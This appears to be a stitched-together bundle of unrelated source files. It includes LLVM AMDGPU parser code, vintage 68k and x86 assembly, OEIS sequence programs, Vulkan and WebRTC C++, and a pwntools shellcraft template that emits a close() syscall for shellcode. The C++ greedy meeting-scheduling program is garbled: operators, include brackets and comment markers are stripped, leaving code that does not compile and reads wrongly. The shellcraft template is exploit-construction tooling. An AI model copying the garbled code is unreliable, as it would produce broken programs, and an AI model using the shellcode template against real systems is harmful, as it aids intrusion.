return Operand.isLDS() ? Match_Success : Match_InvalidOperand;
case MCK_idxen:
return Operand.isIdxen() ? Match_Success : Match_InvalidOperand;
case MCK_offen:
return Operand.isOffen() ? Match_Success : Match_InvalidOperand;
case MCK_SSrcB32:
// When operands have expression values, they will return true for isToken,
// because it is not possible to distinguish between a token and an
// expression at parse time. MatchInstructionImpl() will always try to
// match an operand as a token, when isToken returns true, and when the
// name of the expression is not a valid token, the match will fail,
// so we need to handle it here.
return Operand.isSSrcB32() ? Match_Success : Match_InvalidOperand;
case MCK_SSrcF32:
return Operand.isSSrcF32() ? Match_Success : Match_InvalidOperand;
case MCK_SoppBrTarget:
return Operand.isSoppBrTarget() ? Match_Success : Match_InvalidOperand;
case MCK_VReg32OrOff:
return Operand.isVReg32OrOff() ? Match_Success : Match_InvalidOperand;
case MCK_InterpSlot:
return Operand.isInterpSlot() ? Match_Success : Match_InvalidOperand;
case MCK_Attr:
return Operand.isInterpAttr() ? Match_Success : Match_InvalidOperand;
case MCK_AttrChan:
return Operand.isAttrChan() ? Match_Success : Match_InvalidOperand;
case MCK_ImmSMEMOffset:
return Operand.isSMEMOffset() ? Match_Success : Match_InvalidOperand;
case MCK_SReg_64:
case MCK_SReg_64_XEXEC:
// Null is defined as a 32-bit register but
// it should also be enabled with 64-bit operands.
// The following code enables it for SReg_64 operands
// used as source and destination. Remaining source
// operands are handled in isInlinableImm.
return Operand.isNull() ? Match_Success : Match_InvalidOperand;
default:
return Match_InvalidOperand;
}
}
//===----------------------------------------------------------------------===//
// endpgm
//===----------------------------------------------------------------------===//
OperandMatchResultTy AMDGPUAsmParser::parseEndpgmOp(OperandVector &Operands) {
SMLoc S = getLoc();
int64_t Imm = 0;
if (!parseExpr(Imm)) {
// The operand is optional, if not present default to 0
Imm = 0;
}
if (!isUInt<16>(Imm)) {
Error(S, "expected a 16-bit value");
return MatchOperand_ParseFail;
}
Operands.push_back(
AMDGPUOperand::CreateImm(this, Imm, S, AMDGPUOperand::ImmTyEndpgm));
return MatchOperand_Success;
}
bool AMDGPUOperand::isEndpgm() const { return isImmTy(ImmTyEndpgm); }
|
; General IO utility: fetch byte with cursor V2.00 1988 Tony Tebby
section gen_util
xdef gu_fbcur
xref gu_iow
include 'dev8_keys_qdos_io'
;+++
; This routine does fetch byte with cursor enabled
;
; d1 r byte fetched
; a0 c p channel ID
; a1 p
; error returns standard
;---
gu_fbcur
move.l a1,-(sp)
moveq #iow.ecur,d0 ; enable cursor
bsr.s gu_iow
moveq #iob.fbyt,d0
bsr.s gu_iow ; fetch byte
movem.l d0/d1,-(sp)
moveq #iow.dcur,d0 ; and disable cursor
bsr.s gu_iow
movem.l (sp)+,d0/d1/a1 ; restore byte read and status
tst.l d0
rts
end
|
; A130235: Partial sums of the 'lower' Fibonacci Inverse A130233.
; 0,2,5,9,13,18,23,28,34,40,46,52,58,65,72,79,86,93,100,107,114,122,130,138,146,154,162,170,178,186,194,202,210,218,227,236,245,254,263,272,281,290,299,308,317,326,335,344,353,362,371,380,389,398,407,417,427
lpb $0
mov $2,$0
sub $0,1
seq $2,131234 ; Starts with 1, then n appears Fibonacci(n-1) times.
add $1,$2
lpe
mov $0,$1
|
#include bitsstdc++.h
using namespace std;
Structure for storing meeting pair(start, finish) position of meeting.
struct meeting {
int start;
int end;
int pos;
};
Sorting meetings based on finish time
bool endSort(struct meeting m1, meeting m2)
{
return (m1.end m2.end);
}
Function for finding maximum meeting in one room
void maximumMeetings(int s[], int f[], int n)
{
struct meeting meet[n];
int c = 1;
Creating pairs of meeting(start,end) and position
for (int i = 0; i n; i++)
{
meet[i].start = s[i];
meet[i].end = f[i];
meet[i].pos = i + 1;
}
Sorting of meetings in ascending order according to their finish time
sort(meet, meet + n, endSort);
Vector for storing selected meeting.
vectorint m;
First meeting is always selected
m.push_back(meet[0].pos);
int prev_end = meet[0].end;
Checking if meeting can take place or not
for (int i = 1; i n; i++) {
if (meet[i].start = prev_end)
{
m.push_back(meet[i].pos);
prev_end = meet[i].end;
c++;
}
}
coutMaximum meetings that can take place are c;
coutnSelected meetings ;
for (int i = 0; i m.size(); i++) {
cout m[i] ;
}
}
Driver code
int main()
{
Start times
int s[] = { 1, 2, 0, 6, 9, 10 };
Finish times
int f[] = { 3, 5, 7, 8, 11, 12 };
int n = sizeof(s) sizeof(s[0]);
maximumMeetings(s, f, n);
return 0;
}
|
#include "drape/vulkan/vulkan_utils.hpp"
#include <array>
namespace dp
{
namespace vulkan
{
namespace
{
// Sampler package.
uint8_t constexpr kWrapSModeByte = 3;
uint8_t constexpr kWrapTModeByte = 2;
uint8_t constexpr kMagFilterByte = 1;
uint8_t constexpr kMinFilterByte = 0;
} // namespace
std::string GetVulkanResultString(VkResult result)
{
switch (result)
{
case VK_SUCCESS: return "VK_SUCCESS";
case VK_NOT_READY: return "VK_NOT_READY";
case VK_TIMEOUT: return "VK_TIMEOUT";
case VK_EVENT_SET: return "VK_EVENT_SET";
case VK_EVENT_RESET: return "VK_EVENT_RESET";
case VK_INCOMPLETE: return "VK_INCOMPLETE";
case VK_ERROR_OUT_OF_HOST_MEMORY: return "VK_ERROR_OUT_OF_HOST_MEMORY";
case VK_ERROR_OUT_OF_DEVICE_MEMORY: return "VK_ERROR_OUT_OF_DEVICE_MEMORY";
case VK_ERROR_INITIALIZATION_FAILED: return "VK_ERROR_INITIALIZATION_FAILED";
case VK_ERROR_DEVICE_LOST: return "VK_ERROR_DEVICE_LOST";
case VK_ERROR_MEMORY_MAP_FAILED: return "VK_ERROR_MEMORY_MAP_FAILED";
case VK_ERROR_LAYER_NOT_PRESENT: return "VK_ERROR_LAYER_NOT_PRESENT";
case VK_ERROR_EXTENSION_NOT_PRESENT: return "VK_ERROR_EXTENSION_NOT_PRESENT";
case VK_ERROR_FEATURE_NOT_PRESENT: return "VK_ERROR_FEATURE_NOT_PRESENT";
case VK_ERROR_INCOMPATIBLE_DRIVER: return "VK_ERROR_INCOMPATIBLE_DRIVER";
case VK_ERROR_TOO_MANY_OBJECTS: return "VK_ERROR_TOO_MANY_OBJECTS";
case VK_ERROR_FORMAT_NOT_SUPPORTED: return "VK_ERROR_FORMAT_NOT_SUPPORTED";
case VK_ERROR_FRAGMENTED_POOL: return "VK_ERROR_FRAGMENTED_POOL";
case VK_ERROR_SURFACE_LOST_KHR: return "VK_ERROR_SURFACE_LOST_KHR";
case VK_ERROR_NATIVE_WINDOW_IN_USE_KHR: return "VK_ERROR_NATIVE_WINDOW_IN_USE_KHR";
case VK_SUBOPTIMAL_KHR: return "VK_SUBOPTIMAL_KHR";
case VK_ERROR_OUT_OF_DATE_KHR: return "VK_ERROR_OUT_OF_DATE_KHR";
case VK_ERROR_INCOMPATIBLE_DISPLAY_KHR: return "VK_ERROR_INCOMPATIBLE_DISPLAY_KHR";
case VK_ERROR_VALIDATION_FAILED_EXT: return "VK_ERROR_VALIDATION_FAILED_EXT";
case VK_ERROR_INVALID_SHADER_NV: return "VK_ERROR_INVALID_SHADER_NV";
case VK_ERROR_INVALID_DRM_FORMAT_MODIFIER_PLANE_LAYOUT_EXT:
return "VK_ERROR_INVALID_DRM_FORMAT_MODIFIER_PLANE_LAYOUT_EXT";
case VK_ERROR_FRAGMENTATION_EXT: return "VK_ERROR_FRAGMENTATION_EXT";
case VK_ERROR_NOT_PERMITTED_EXT: return "VK_ERROR_NOT_PERMITTED_EXT";
case VK_ERROR_OUT_OF_POOL_MEMORY_KHR: return "VK_ERROR_OUT_OF_POOL_MEMORY_KHR";
case VK_ERROR_INVALID_EXTERNAL_HANDLE_KHR: return "VK_ERROR_INVALID_EXTERNAL_HANDLE_KHR";
case VK_RESULT_RANGE_SIZE: return "VK_RESULT_RANGE_SIZE";
case VK_RESULT_MAX_ENUM: return "VK_RESULT_MAX_ENUM";
}
UNREACHABLE();
return "Unknown result";
}
// static
VkFormat VulkanFormatUnpacker::m_bestDepthFormat = VK_FORMAT_UNDEFINED;
// static
bool VulkanFormatUnpacker::Init(VkPhysicalDevice gpu)
{
std::array<VkFormat, 3> depthFormats = {{VK_FORMAT_D32_SFLOAT,
VK_FORMAT_X8_D24_UNORM_PACK32,
VK_FORMAT_D16_UNORM}};
VkFormatProperties formatProperties;
for (auto depthFormat : depthFormats)
{
vkGetPhysicalDeviceFormatProperties(gpu, depthFormat, &formatProperties);
if (formatProperties.optimalTilingFeatures & VK_FORMAT_FEATURE_DEPTH_STENCIL_ATTACHMENT_BIT)
{
m_bestDepthFormat = depthFormat;
break;
}
}
if (m_bestDepthFormat == VK_FORMAT_UNDEFINED)
{
LOG(LWARNING, ("Vulkan error: there is no any supported depth format."));
return false;
}
vkGetPhysicalDeviceFormatProperties(gpu, Unpack(TextureFormat::DepthStencil), &formatProperties);
if (!(formatProperties.optimalTilingFeatures & VK_FORMAT_FEATURE_DEPTH_STENCIL_ATTACHMENT_BIT))
{
LOG(LWARNING, ("Vulkan error: depth-stencil format is unsupported."));
return false;
}
std::array<VkFormat, 2> framebufferColorFormats = {{Unpack(TextureFormat::RGBA8),
Unpack(TextureFormat::RedGreen)}};
for (auto colorFormat : framebufferColorFormats)
{
vkGetPhysicalDeviceFormatProperties(gpu, colorFormat, &formatProperties);
if (!(formatProperties.optimalTilingFeatures & VK_FORMAT_FEATURE_COLOR_ATTACHMENT_BIT))
{
LOG(LWARNING, ("Vulkan error: framebuffer format", colorFormat, "is unsupported."));
return false;
}
}
return true;
}
// static
VkFormat VulkanFormatUnpacker::Unpack(TextureFormat format)
{
switch (format)
{
case TextureFormat::RGBA8: return VK_FORMAT_R8G8B8A8_UNORM;
case TextureFormat::Alpha: return VK_FORMAT_R8_UNORM;
case TextureFormat::RedGreen: return VK_FORMAT_R8G8_UNORM;
case TextureFormat::DepthStencil: return VK_FORMAT_D24_UNORM_S8_UINT;
case TextureFormat::Depth: return m_bestDepthFormat;
case TextureFormat::Unspecified:
CHECK(false, ());
return VK_FORMAT_UNDEFINED;
}
CHECK(false, ());
}
SamplerKey::SamplerKey(TextureFilter filter, TextureWrapping wrapSMode, TextureWrapping wrapTMode)
{
Set(filter, wrapSMode, wrapTMode);
}
void SamplerKey::Set(TextureFilter filter, TextureWrapping wrapSMode, TextureWrapping wrapTMode)
{
SetStateByte(m_sampler, static_cast<uint8_t>(filter), kMinFilterByte);
SetStateByte(m_sampler, static_cast<uint8_t>(filter), kMagFilterByte);
SetStateByte(m_sampler, static_cast<uint8_t>(wrapSMode), kWrapSModeByte);
SetStateByte(m_sampler, static_cast<uint8_t>(wrapTMode), kWrapTModeByte);
}
TextureFilter SamplerKey::GetTextureFilter() const
{
return static_cast<TextureFilter>(GetStateByte(m_sampler, kMinFilterByte));
}
TextureWrapping SamplerKey::GetWrapSMode() const
{
return static_cast<TextureWrapping>(GetStateByte(m_sampler, kWrapSModeByte));
}
TextureWrapping SamplerKey::GetWrapTMode() const
{
return static_cast<TextureWrapping>(GetStateByte(m_sampler, kWrapTModeByte));
}
bool SamplerKey::operator<(SamplerKey const & rhs) const
{
return m_sampler < rhs.m_sampler;
}
} // namespace vulkan
} // namespace dp
|
; A040063: Continued fraction for sqrt(72).
; 8,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2
pow $0,4
mov $1,$0
trn $0,4
sub $0,4
gcd $1,$0
mul $1,2
|
; SBAS_JOB - SBASIC Job V2.00 1994 Tony Tebby QJUMP
section sbas
xdef sb_job
xdef sb_die
xdef sb_fatal
xdef sb_name
xdef sb_thing
xref sb_initv
xref sb_initc
xref sb_main
xref sb_start
xref sb_xcmd
xref sb_qd5
xref sb_anam2
xref sb_aldat
xref sb_resch
xref sb_inchan
xref.l sb.vers
xref uq_opcon
xref gu_thini
xref gu_mexec
include 'dev8_keys_sbasic'
include 'dev8_keys_qlv'
include 'dev8_keys_qdos_sms'
include 'dev8_keys_thg'
include 'dev8_keys_k'
include 'dev8_keys_err'
include 'dev8_mac_assert'
;+++
; Initialise Thing
;---
sb_thing
lea sb_thtab,a1
jmp gu_thini
sb_thtab
dc.l th_name+8 ; size of linkage
dc.l sb_thdef-* ; thing
dc.l sb.vers ; version
sb_name
dc.w 6,'SBASIC'
sb_thdef
dc.l thh.flag ; flag
dc.l tht.exec ; executable
dc.l sb_job-sb_thdef ; header
dc.l sbj_start-sb_job ; ... length
dc.l sb.jobsz ; dataspace
dc.l sbj_start-sb_thdef ; start address
;+++
; SBASIC Job
;---
sb_job
bra.s sbj_start
dc.w 0,0,$4afb
dc.w 6,'SBASIC'
sbj_job0
jsr sb_initc ; initialise job zero consoles
jmp sb_main
sbj_start
move.l a0,d0 ; A0 is set if Job 0 entry
bne.s sbj_job0 ; ... job 0 entry, vars already set
jsr sb_initv ; initial SBASIC allocation
move.w (sp)+,d4 ; number of channels open
beq.l sbj_new ; new SBASIC
move.l (sp),d0 ; first ID
bmi.s sbj_chn0 ; definition for channel 0 (d4>0)
cmp.l #'QD5S',d0
beq.l sb_qd5
move.l (sp)+,sb_cmdch(a6) ; input file
subq.w #1,d4
beq.s sbj_ckstr ; no channels on stack
moveq #ch.len,d1
mulu d4,d1 ; room required in channel table
jsr sb_resch
move.l sb_chanp(a6),a2
subq.w #1,d4
bgt.s sbj_chloop ; more than 2 channels
tst.w (sp) ; channel 0 open?
bmi.s sbj_chn0 ; definition for channel 0 (d4=0)
sbj_chloop
move.l (sp)+,a0
jsr sb_inchan ; set up channel
dbra d4,sbj_chloop
move.l a2,sb_chanp(a6)
sbj_ckstr
move.w (sp)+,d3 ; length of string
beq.l sbj_go ; ... none
bra.s sbj_cmd$ ; set cmd$
; open console - size on stack, stack is cleaned
sbj_open0
move.l (sp)+,a3
move.l #$ff010004,-(sp) ; colour
move.l sp,a1
jsr uq_opcon
bne.l sb_fatal
add.w #$c,sp ; clear stack
move.l sb_chanp(a6),a2
jsr sb_inchan ; open channel
move.l a2,sb_chanp(a6)
jmp (a3)
sbj_chn0
not.l (sp) ; set origin right
move.l #$0100003e,-(sp) ; size
bsr sbj_open0 ; open it
move.w (sp)+,d3 ; length of string
beq.s sbj_go ; ... none
tst.w d4 ; d4 is 0 for string = cmd$
bne.s sbj_cmdl ; 1 for string = command line
sbj_cmd$
move.l sb_buffb(a6),a1
move.l #'cmd$',(a6,a1.l)
moveq #4,d2 ; set up cmd$
jsr sb_anam2
move.b #nt.var,(a6,a3.l) ; and usage
moveq #dt_stchr-dt_stalc+7,d1 ; add 6 bytes and round up
add.w d3,d1
and.w #$fff8,d1 ; to multiple of 8
jsr sb_aldat ; allocate hole
assert dt_stalc+4,dt_flstr+1,dt_stlen
move.w d1,(a0)+ ; allocation
move.w #$00ff,(a0)+ ; flags
move.l a0,nt_value(a6,a3.l)
move.w d3,(a0)+ ; length
sbj_csloop
move.w (sp)+,(a0)+ ; copy characters
subq.w #2,d3
bgt.s sbj_csloop
bra.s sbj_go
sbj_new
move.w (sp)+,d3 ; any string?
beq.s sbj_all ; ... no, open all
sbj_cmdl
move.l sb_buffb(a6),a1
add.l a6,a1
sbl_clloop
move.w (sp)+,(a1)+
subq.w #2,d3
bgt.s sbl_clloop
add.w d3,a1 ; correct the position
move.b #k.nl,(a1)+ ; newline at end
sub.l a6,a1
move.l a1,sb_buffp(a6)
jmp sb_xcmd ; execute first command
sbj_all
jsr sb_initc ; open all consoles
sbj_go
jmp sb_start
sb_die
moveq #0,d0
sb_fatal
move.l d0,d3
moveq #-1,d1
moveq #sms.frjb,d0
trap #do.sms2
dc.l $4afbedeb
bra.s *
dc.l 'DIE '
end
|
; A168059: Denominator of (n+2)/(n*(n+1)).
; 2,3,12,10,30,21,56,36,90,55,132,78,182,105,240,136,306,171,380,210,462,253,552,300,650,351,756,406,870,465,992,528,1122,595,1260,666,1406,741,1560,820,1722,903,1892,990,2070,1081,2256,1176,2450,1275,2652,1378,2862,1485,3080,1596,3306,1711,3540,1830,3782,1953,4032,2080,4290,2211,4556,2346,4830,2485,5112,2628,5402,2775,5700,2926,6006,3081,6320,3240,6642,3403,6972,3570,7310,3741,7656,3916,8010,4095,8372,4278,8742,4465,9120,4656,9506,4851,9900,5050
mov $2,-2
gcd $2,$0
add $0,1
mul $2,$0
mul $0,$2
add $0,$2
div $0,2
|
object_const_def
Shimoda_MapScripts:
db 0 ; scene scripts
db 0 ; callbacks
;callback MAPCALLBACK_NEWMAP, .InitializeRoom
;callback MAPCALLBACK_TILES, .SetSpawn
Shimoda_MapEvents:
db 0, 0 ; filler
db 0 ; warp events
db 0 ; coord events
db 0 ; bg events
;bg_event 0, 1, BGEVENT_READ, RedsHouse1FBookshelf
;bg_event 1, 1, BGEVENT_READ, RedsHouse1FBookshelf
;bg_event 2, 1, BGEVENT_READ, RedsHouse1FTV
db 0 ; object events
;object_event 5, 3, SPRITE_REDS_MOM, SPRITEMOVEDATA_STANDING_LEFT, 0, 0, -1, -1, 0, OBJECTTYPE_SCRIPT, 0, RedsMom, -1
|
; Repeat Block Examples (Repeat.asm)
; This program demonstrates the REPEAT, FOR,
; FORC, and WHILE directives.
INCLUDE Irvine32.inc
INCLUDE Macros.inc
COURSE STRUCT
Number BYTE 9 DUP(?)
Credits BYTE ?
COURSE ENDS
; A semester contains an array of courses.
SEMESTER STRUCT
Courses COURSE 6 DUP(<>)
NumCourses WORD ?
SEMESTER ENDS
.data
; Create a character lookup table:
Delimiters LABEL BYTE
FORC code,<@#$%^&*!<!>>
BYTE "&code"
ENDM
BYTE 0 ; marks the end
; Generate Fibonacci numbers up to 0FFFFh
f1 = 1
f2 = 1
f3 = f1 + f2
DWORD f1,f2
WHILE f3 LT 0FFFFh
DWORD f3
f1 = f2
f2 = f3
f3 = f1 + f2
ENDM
ECHO ---------------------------------------------------------
iVal = 10
REPEAT 100 ; begin REPT loop
DWORD iVal ; status
iVal = iVal + 10
ENDM
WEEKS_PER_YEAR = 52
WeatherReadings STRUCT
location BYTE 50 DUP(0)
REPEAT WEEKS_PER_YEAR
LOCAL rainfall, humidity
rainfall DWORD ?
humidity DWORD ?
ENDM
WeatherReadings ENDS
;-----------------------------------------------------------
; Define a set of semester variables.
FOR semName,<Fall1999,Spring2000,Summer2000,Fall2000,Spring2001,Summer2001>
semName SEMESTER <>
ENDM
.code
main PROC
mov esi,OFFSET Fall1999
mov ecx,2
L1:
mov edx,esi
add edx,OFFSET COURSE.Number
mWrite "Enter a course name: "
mov ecx,8
call ReadString
mWrite "Enter the credits: "
call ReadInt
mov (COURSE PTR [esi]).Credits,al
add esi,SIZEOF COURSE
Loop L1
exit
main ENDP
END main |
;; 32-bit mode
bits 32
MBOOT_HEADER_MAGIC equ 0xe85250d6
MBOOT_I386_ARCHITECTURE equ 0
extern kernel_main
extern stack_top
global start
section .multiboot
mboot_start:
;; Magic number
dd MBOOT_HEADER_MAGIC
;; Architecture (protected mode i386)
dd MBOOT_I386_ARCHITECTURE
;; Header length
dd mboot_end - mboot_start
;; Checksum
dd 0x100000000 - (MBOOT_HEADER_MAGIC + MBOOT_I386_ARCHITECTURE + (mboot_end - mboot_start))
;; End tag
dw 0
dw 0
dd 8
mboot_end:
section .text
start:
push ebx
mov esp, stack_top
cli ; Clear interrupts
call kernel_main
jmp $
|
; A143831: Numbers n such that 12n^2 - 1 is prime.
; Submitted by Jamie Morken(w3)
; 1,2,3,4,6,7,9,11,13,14,15,17,20,22,24,25,26,27,29,30,35,36,37,38,39,46,48,55,59,61,68,69,72,75,77,79,82,88,91,93,94,102,105,107,108,115,116,117,118,121,124,130,134,136,137,140,149,152,154,157,158,159,162,167
mov $1,2
mov $2,332202
mov $5,1
lpb $2
mov $3,$6
seq $3,10051 ; Characteristic function of primes: 1 if n is prime, else 0.
sub $0,$3
add $1,3
mov $4,$0
max $4,0
cmp $4,$0
mul $2,$4
sub $2,18
add $5,$1
sub $5,1
add $5,$1
mov $6,$5
lpe
mov $0,$1
div $0,6
add $0,1
|
; PipisX86
; By Nathaniel Carman
; Wheres all the pipis?
; aowww yeahhhhhhhhhh
; Pipis Room.
section .text
global _start
_start:
mov edx,amo ; sussy
mov ecx,gus ; imposter
mov ebx,1
mov eax,4
int 0x80
mov edx,len1
mov ecx,msg1
mov ebx,1
mov eax,4
int 0x80
mov edx,len2
mov ecx,msg2
mov ebx,1
mov eax,4
int 0x80
mov eax,1
int 0x80
section .data
amo db 'This Uses The MIT Licence BTW', 0xa
gus equ $ - amo
msg1 db 'o <----- pipis', 0xa
len1 equ $ - msg1
msg2 db 'Pipis.', 0xa
len2 equ $ - msg2
|
; A141620: First differences of A120070.
; Submitted by Jon Maiga
; 5,-3,10,-3,-5,17,-3,-5,-7,26,-3,-5,-7,-9,37,-3,-5,-7,-9,-11,50,-3,-5,-7,-9,-11,-13,65,-3,-5,-7,-9,-11,-13,-15,82,-3,-5,-7,-9,-11,-13,-15,-17,101,-3,-5,-7,-9,-11,-13,-15,-17,-19,122,-3,-5,-7,-9,-11,-13,-15,-17,-19,-21
mov $3,2
mov $4,$0
lpb $3
mov $0,$4
div $3,2
add $0,$3
seq $0,120070 ; Triangle of numbers used to compute the frequencies of the spectral lines of the hydrogen atom.
mov $2,$3
mul $2,$0
add $1,$2
mov $5,$0
lpe
sub $1,$5
mov $0,$1
|
;
; ZX Spectrum OPUS DISCOVERY specific routines
;
; Stefano Bodrato - Jun. 2006
;
; This routine get the kempston joystick emulation status.
;
; $Id: get_kempston.asm,v 1.3 2016/06/27 19:16:33 dom Exp $
;
SECTION code_clib
PUBLIC get_kempston
PUBLIC _get_kempston
get_kempston:
_get_kempston:
call $1708 ; page_in
ld a,($3000)
and 128
ld hl,0
and a
jr z,pageout
inc hl
.pageout
jp $1748
|
; Making sure the edge case of instructions directly specified as data is handled
; in this case, just for safety, the blocks before and after the "db" statement
; should not be moved.
ld a, 1
jp label1
label2: ; ideally, we would want this block to be moved at the very end,
; but the "db 0" breaks the block in two, and for safety, no
; optimization is made.
ld (hl), a
label3:
jr label3
label1:
add a, b
db 0 ; this is a "nop", but specified directly as a byte
jp label2
|
; A302245: Maximum remainder of p*q divided by p+q with 0 < p <= q <= n.
; 1,2,3,5,7,8,11,11,15,15,19,19,23,23,27,27,31,31,35,35,39,39,43,43,47,47,51,51,55,55,59,59,63,63,67,67,71,71,75,75,79,79,83,83,87,87,91,91,95,95,99,99,103,103,107,107,111,111,115,115,119,119,123,123
mov $2,$0
lpb $2
add $0,$1
mul $1,$2
gcd $1,2
sub $2,$1
gcd $1,$0
lpe
add $0,1
|
<%
import collections
import pwnlib.abi
import pwnlib.constants
import pwnlib.shellcraft
import six
%>
<%docstring>close(fd) -> str
Invokes the syscall close.
See 'man 2 close' for more information.
Arguments:
fd(int): fd
Returns:
int
</%docstring>
<%page args="fd=0"/>
<%
abi = pwnlib.abi.ABI.syscall()
stack = abi.stack
regs = abi.register_arguments[1:]
allregs = pwnlib.shellcraft.registers.current()
can_pushstr = []
can_pushstr_array = []
argument_names = ['fd']
argument_values = [fd]
# Load all of the arguments into their destination registers / stack slots.
register_arguments = dict()
stack_arguments = collections.OrderedDict()
string_arguments = dict()
dict_arguments = dict()
array_arguments = dict()
syscall_repr = []
for name, arg in zip(argument_names, argument_values):
if arg is not None:
syscall_repr.append('%s=%r' % (name, arg))
# If the argument itself (input) is a register...
if arg in allregs:
index = argument_names.index(name)
if index < len(regs):
target = regs[index]
register_arguments[target] = arg
elif arg is not None:
stack_arguments[index] = arg
# The argument is not a register. It is a string value, and we
# are expecting a string value
elif name in can_pushstr and isinstance(arg, (six.binary_type, six.text_type)):
if isinstance(arg, six.text_type):
arg = arg.encode('utf-8')
string_arguments[name] = arg
# The argument is not a register. It is a dictionary, and we are
# expecting K:V paris.
elif name in can_pushstr_array and isinstance(arg, dict):
array_arguments[name] = ['%s=%s' % (k,v) for (k,v) in arg.items()]
# The arguent is not a register. It is a list, and we are expecting
# a list of arguments.
elif name in can_pushstr_array and isinstance(arg, (list, tuple)):
array_arguments[name] = arg
# The argument is not a register, string, dict, or list.
# It could be a constant string ('O_RDONLY') for an integer argument,
# an actual integer value, or a constant.
else:
index = argument_names.index(name)
if index < len(regs):
target = regs[index]
register_arguments[target] = arg
elif arg is not None:
stack_arguments[target] = arg
# Some syscalls have different names on various architectures.
# Determine which syscall number to use for the current architecture.
for syscall in ['SYS_close']:
if hasattr(pwnlib.constants, syscall):
break
else:
raise Exception("Could not locate any syscalls: %r" % syscalls)
%>
/* close(${', '.join(syscall_repr)}) */
%for name, arg in string_arguments.items():
${pwnlib.shellcraft.pushstr(arg, append_null=(b'\x00' not in arg))}
${pwnlib.shellcraft.mov(regs[argument_names.index(name)], abi.stack)}
%endfor
%for name, arg in array_arguments.items():
${pwnlib.shellcraft.pushstr_array(regs[argument_names.index(name)], arg)}
%endfor
%for name, arg in stack_arguments.items():
${pwnlib.shellcraft.push(arg)}
%endfor
${pwnlib.shellcraft.setregs(register_arguments)}
${pwnlib.shellcraft.syscall(syscall)} |
// smtc_VdfBlockDataScope.inl
//
#ifdef LZZ_ENABLE_INLINE
#define LZZ_INLINE inline
#else
#define LZZ_INLINE
#endif
namespace smtc
{
LZZ_INLINE VdfDataFuncDefnPtr const & VdfBlockDataScope::getVdfDataFuncDefn () const
{
return m_vdf_data_func_defn;
}
}
#undef LZZ_INLINE
|
/*
* Copyright (c) 2015 The WebRTC project authors. All Rights Reserved.
*
* Use of this source code is governed by a BSD-style license
* that can be found in the LICENSE file in the root of the source
* tree. An additional intellectual property rights grant can be found
* in the file PATENTS. All contributing project authors may
* be found in the AUTHORS file in the root of the source tree.
*/
#include "webrtc/common_video/include/video_frame_buffer.h"
#include "webrtc/base/bind.h"
#include "webrtc/base/checks.h"
// Aligning pointer to 64 bytes for improved performance, e.g. use SIMD.
static const int kBufferAlignment = 64;
namespace webrtc {
namespace {
// Used in rtc::Bind to keep a buffer alive until destructor is called.
static void NoLongerUsedCallback(rtc::scoped_refptr<VideoFrameBuffer> dummy) {}
} // anonymous namespace
uint8_t* VideoFrameBuffer::MutableData(PlaneType type) {
RTC_NOTREACHED();
return nullptr;
}
VideoFrameBuffer::~VideoFrameBuffer() {}
I420Buffer::I420Buffer(int width, int height)
: I420Buffer(width, height, width, (width + 1) / 2, (width + 1) / 2) {
}
I420Buffer::I420Buffer(int width,
int height,
int stride_y,
int stride_u,
int stride_v)
: width_(width),
height_(height),
stride_y_(stride_y),
stride_u_(stride_u),
stride_v_(stride_v),
data_(static_cast<uint8_t*>(AlignedMalloc(
stride_y * height + (stride_u + stride_v) * ((height + 1) / 2),
kBufferAlignment))) {
RTC_DCHECK_GT(width, 0);
RTC_DCHECK_GT(height, 0);
RTC_DCHECK_GE(stride_y, width);
RTC_DCHECK_GE(stride_u, (width + 1) / 2);
RTC_DCHECK_GE(stride_v, (width + 1) / 2);
}
I420Buffer::~I420Buffer() {
}
int I420Buffer::width() const {
return width_;
}
int I420Buffer::height() const {
return height_;
}
const uint8_t* I420Buffer::data(PlaneType type) const {
switch (type) {
case kYPlane:
return data_.get();
case kUPlane:
return data_.get() + stride_y_ * height_;
case kVPlane:
return data_.get() + stride_y_ * height_ +
stride_u_ * ((height_ + 1) / 2);
default:
RTC_NOTREACHED();
return nullptr;
}
}
uint8_t* I420Buffer::MutableData(PlaneType type) {
RTC_DCHECK(HasOneRef());
return const_cast<uint8_t*>(
static_cast<const VideoFrameBuffer*>(this)->data(type));
}
int I420Buffer::stride(PlaneType type) const {
switch (type) {
case kYPlane:
return stride_y_;
case kUPlane:
return stride_u_;
case kVPlane:
return stride_v_;
default:
RTC_NOTREACHED();
return 0;
}
}
void* I420Buffer::native_handle() const {
return nullptr;
}
rtc::scoped_refptr<VideoFrameBuffer> I420Buffer::NativeToI420Buffer() {
RTC_NOTREACHED();
return nullptr;
}
NativeHandleBuffer::NativeHandleBuffer(void* native_handle,
int width,
int height)
: native_handle_(native_handle), width_(width), height_(height) {
RTC_DCHECK(native_handle != nullptr);
RTC_DCHECK_GT(width, 0);
RTC_DCHECK_GT(height, 0);
}
int NativeHandleBuffer::width() const {
return width_;
}
int NativeHandleBuffer::height() const {
return height_;
}
const uint8_t* NativeHandleBuffer::data(PlaneType type) const {
RTC_NOTREACHED(); // Should not be called.
return nullptr;
}
int NativeHandleBuffer::stride(PlaneType type) const {
RTC_NOTREACHED(); // Should not be called.
return 0;
}
void* NativeHandleBuffer::native_handle() const {
return native_handle_;
}
WrappedI420Buffer::WrappedI420Buffer(int width,
int height,
const uint8_t* y_plane,
int y_stride,
const uint8_t* u_plane,
int u_stride,
const uint8_t* v_plane,
int v_stride,
const rtc::Callback0<void>& no_longer_used)
: width_(width),
height_(height),
y_plane_(y_plane),
u_plane_(u_plane),
v_plane_(v_plane),
y_stride_(y_stride),
u_stride_(u_stride),
v_stride_(v_stride),
no_longer_used_cb_(no_longer_used) {
}
WrappedI420Buffer::~WrappedI420Buffer() {
no_longer_used_cb_();
}
